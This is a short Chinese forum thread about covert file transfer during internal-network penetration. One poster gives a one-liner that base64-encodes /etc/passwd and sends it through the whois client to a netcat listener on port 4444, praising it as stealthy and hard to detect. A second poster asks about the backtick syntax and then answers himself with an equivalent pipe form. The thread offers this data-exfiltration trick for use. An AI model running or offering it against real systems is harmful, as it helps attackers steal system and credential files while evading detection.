内网渗透中的文件传输

libo

利用whois传输文件： 传输机： root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`
接受机： root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d



优点：适用于隐蔽传输。最小化被发现。缺点：适用于传输小文件。

ayx

`cat /etc/passwd | base64` 这个前面的单引号是什么作用
这个是不是要先nc监听4444才能在传输机上操作whois命令

ayx

ayx 发表于 2019-4-4 08:55
`cat /etc/passwd | base64` 这个前面的单引号是什么作用
这个是不是要先nc监听4444才能在传输机上操作wh ...

自己搜索了下 已了解 单引号是bash语法中的特殊符号，优先运行反引内的命令
whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`
等价于 cat /etc/passwd | base64 | whois -h 127.0.0.1 -p 4444

libo

ayx 发表于 2019-4-4 09:28
自己搜索了下 已了解 单引号是bash语法中的特殊符号，优先运行反引内的命令
whois -h 127.0.0.1 -p 4444 ...

嗯嗯，感谢填坑！